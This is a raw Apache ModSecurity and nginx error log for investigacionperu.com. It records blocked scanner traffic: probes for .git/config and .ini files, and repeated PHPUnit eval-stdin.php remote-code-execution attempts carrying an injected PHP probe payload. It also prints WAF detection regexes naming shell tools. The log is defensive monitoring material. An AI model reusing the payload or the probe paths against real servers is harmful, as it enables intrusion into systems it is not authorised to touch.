23:37:22.258773 2023] [:error] [pid 25270:tid 139911092983552] [client 154.6.12.10:51026] [client 154.6.12.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZHrDgnQwbijrCUZXcJSLJwAAAMo"] [Fri Jun 02 23:37:22.273984 2023] [:error] [pid 25270:tid 139911134947072] [client 154.6.12.10:51028] [client 154.6.12.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZHrDgnQwbijrCUZXcJSLKAAAAMU"] [Fri Jun 02 23:37:22.394763 2023] [:error] [pid 25178:tid 139911134947072] [client 154.6.12.10:51030] [client 154.6.12.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZHrDguLFraKNyvRdsNBVGgAAAIU"] [Fri Jun 02 23:37:23.482088 2023] [:error] [pid 25270:tid 139911017449216] [client 154.6.12.10:51032] [client 154.6.12.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZHrDg3QwbijrCUZXcJSLKQAAANM"] [Sat Jun 03 03:36:21.038161 2023] [ssl:warn] [pid 4774:tid 140175708366720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jun 03 03:36:21.204906 2023] [ssl:warn] [pid 4775:tid 140175708366720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jun 03 03:36:21.577528 2023] [ssl:warn] [pid 4775:tid 140175708366720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jun 03 03:36:23.163059 2023] [ssl:warn] [pid 4775:tid 140175708366720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jun 03 03:36:26.802071 2023] [ssl:warn] [pid 5320:tid 140635092498304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jun 03 03:36:26.927777 2023] [ssl:warn] [pid 5321:tid 140635092498304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jun 03 08:56:24.370330 2023] [authz_core:error] [pid 5761:tid 140634786612992] [client 54.227.63.8:47534] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sat Jun 03 08:56:24.377935 2023] [authz_core:error] [pid 5761:tid 140634811791104] [client 54.227.63.8:47532] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sat Jun 03 08:56:27.551279 2023] [:error] [pid 5761:tid 140634736256768] [client 54.227.63.8:47562] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 1). Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "PATCH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/api/v1/status"] [unique_id "ZHtGi4aRI7UXDVsPPl7tJwAAAMw"] [Sat Jun 03 08:56:27.551763 2023] [:error] [pid 5761:tid 140634736256768] [client 54.227.63.8:47564] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 1). Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "PATCH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/api/v1/pay"] [unique_id "ZHtGi4aRI7UXDVsPPl7tKAAAAMw"] [Sat Jun 03 08:56:27.552149 2023] [:error] [pid 5761:tid 140634736256768] [client 54.227.63.8:47566] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 1). Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "PATCH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZHtGi4aRI7UXDVsPPl7tKQAAAMw"] [Sat Jun 03 08:56:27.552551 2023] [:error] [pid 5761:tid 140634736256768] [client 54.227.63.8:47568] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 1). Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "PATCH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/api/v1/user"] [unique_id "ZHtGi4aRI7UXDVsPPl7tKgAAAMw"] [Sat Jun 03 08:56:27.552923 2023] [:error] [pid 5761:tid 140634736256768] [client 54.227.63.8:47570] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 1). Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "PATCH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] [hostname "www.investigacionperu.com"] [uri "/api/v1/pay"] [unique_id "ZHtGi4aRI7UXDVsPPl7tKwAAAMw"] [Sat Jun 03 08:56:27.553276 2023] [:error] [pid 5761:tid 140634736256768] [client 54.227.63.8:47572] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 1). Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "PATCH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] [hostname "www.investigacionperu.com"] [uri "/api/v1/user"] [unique_id "ZHtGi4aRI7UXDVsPPl7tLAAAAMw"] [Sat Jun 03 08:56:30.565108 2023] [:error] [pid 5347:tid 140634811791104] [client 54.227.63.8:47586] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 1). Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "PATCH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZHtGjvUSq05fXv9G2a3b0gAAAEM"] [Sat Jun 03 08:56:30.565807 2023] [:error] [pid 5347:tid 140634811791104] [client 54.227.63.8:47588] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 1). Match of "within %{tx.allowed_methods}" against "REQUEST_METHOD" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "31"] [id "960032"] [rev "2"] [msg "Method is not allowed by policy"] [data "PATCH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/METHOD_NOT_ALLOWED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "OWASP_AppSensor/RE1"] [tag "PCI/12.1"] [hostname "www.investigacionperu.com"] [uri "/api/v1/status"] [unique_id "ZHtGjvUSq05fXv9G2a3b0wAAAEM"] 2023/06/03 08:56:38 [error] 5267#5267: *327098 access forbidden by rule, client: 54.227.63.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/06/03 08:56:45 [error] 5267#5267: *327145 access forbidden by rule, client: 54.227.63.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Jun 03 08:57:00.699118 2023] [:error] [pid 5348:tid 140634911876864] [client 54.227.63.8:47804] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/env.ini"] [unique_id "ZHtGrJijGVlckqbyEBeTTgAAAIA"] [Sat Jun 03 08:57:23.174198 2023] [:error] [pid 5346:tid 140634736256768] [client 54.227.63.8:47926] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/config.ini"] [unique_id "ZHtGww2dMLX60TEX48qHCgAAAAw"] [Sat Jun 03 08:57:39.414525 2023] [:error] [pid 5347:tid 140634786612992] [client 54.227.63.8:47990] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtG0_USq05fXv9G2a3cEwAAAEY"] [Sat Jun 03 08:57:39.415997 2023] [:error] [pid 5347:tid 140634786612992] [client 54.227.63.8:47992] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtG0_USq05fXv9G2a3cFAAAAEY"] [Sat Jun 03 08:57:39.417168 2023] [:error] [pid 5347:tid 140634786612992] [client 54.227.63.8:47994] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtG0_USq05fXv9G2a3cFQAAAEY"] [Sat Jun 03 08:57:43.279414 2023] [:error] [pid 5761:tid 140634795005696] [client 54.227.63.8:48022] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/sites/default/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtG14aRI7UXDVsPPl7tfgAAAMU"] [Sat Jun 03 08:57:43.280558 2023] [:error] [pid 5761:tid 140634795005696] [client 54.227.63.8:48024] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtG14aRI7UXDVsPPl7tfwAAAMU"] [Sat Jun 03 08:57:43.281559 2023] [:error] [pid 5761:tid 140634795005696] [client 54.227.63.8:48026] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtG14aRI7UXDVsPPl7tgAAAAMU"] [Sat Jun 03 08:57:46.708152 2023] [:error] [pid 5761:tid 140634753042176] [client 54.227.63.8:48044] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtG2oaRI7UXDVsPPl7thAAAAMo"] [Sat Jun 03 08:58:12.232931 2023] [:error] [pid 5348:tid 140634677507840] [client 54.227.63.8:48198] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.ini"] [unique_id "ZHtG9JijGVlckqbyEBeTaQAAAJM"] [Sat Jun 03 08:58:22.611887 2023] [:error] [pid 5348:tid 140634685900544] [client 54.227.63.8:48272] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/config.ini"] [unique_id "ZHtG_pijGVlckqbyEBeTfwAAAJI"] [Sat Jun 03 08:58:41.621157 2023] [:error] [pid 5761:tid 140634753042176] [client 54.227.63.8:48354] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match 